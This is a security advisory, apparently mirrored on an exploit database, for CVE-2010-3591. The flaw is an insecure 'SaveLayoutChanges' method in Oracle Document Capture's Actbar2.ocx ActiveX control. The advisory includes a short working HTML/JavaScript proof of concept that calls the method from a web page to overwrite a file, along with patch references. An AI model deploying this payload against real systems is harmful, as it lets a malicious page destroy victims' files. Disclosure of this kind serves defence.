Oracle Document Capture Actbar2.ocx Insecure Method

2011-01-26T00:00:00
ID 1337DAY-ID-15118
Type zdt
Reporter Evdokimov Dmitriy
Modified 2011-01-26T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            Application:            Oracle Document Capture
Versions Affected:      Release 10gR3
Vendor URL:             www.oracle.com
Bugs:                   insecure method, File overwriting
Exploits:               YES
Reported:               22.03.2010
Vendor response:        31.03.2010
Date of Public Advisory:24.01.2011
CVE-number:             CVE-2010-3591
Author:                 Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
 
 
 
Description
***********
 
Oracle Document Capture contains ActiveX components that contains insecure methods.
 
Insecure method in Actbar2.ocx
 
 
Details
*******
 
Oracle Document Capture contains ActiveX component ActiveBar2Library (Actbar2.ocx) Lib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9}
 
which is contains insecure method "SaveLayoutChanges" that can overwrite any unhidden file in system.
 
Class ActiveBar2
GUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9}
Number of Interfaces: 1
Default Interface: IActiveBar2
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False
 
 
 
Exploit
*******
 
Attacker can construct html page which call vulnerable function "SaveLayoutChanges" from ActiveX component Actbar2.ocx
 
Example:
 
<HTML>
         <HEAD>
         <TITLE>DSecRG</TITLE>
         </HEAD>
         <BODY>
          
         <OBJECT id='eds' classid='clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9'></OBJECT>
  
         <SCRIPT>
                  
         function Exploit(){
                 eds.SaveLayoutChanges("C:\\31337.txt",1);            
         }
         Exploit();
  
         </SCRIPT>
</BODY>
</HTML>
 
 
 
References
**********
 
http://dsecrg.com/pages/vul/show.php?id=304
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
 
 
 
 
Fix Information
*************
 
Information was published in CPU Jan 2011.
All customers can download CPU patches following instructions from:
 
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html



#  0day.today [2018-03-01]  #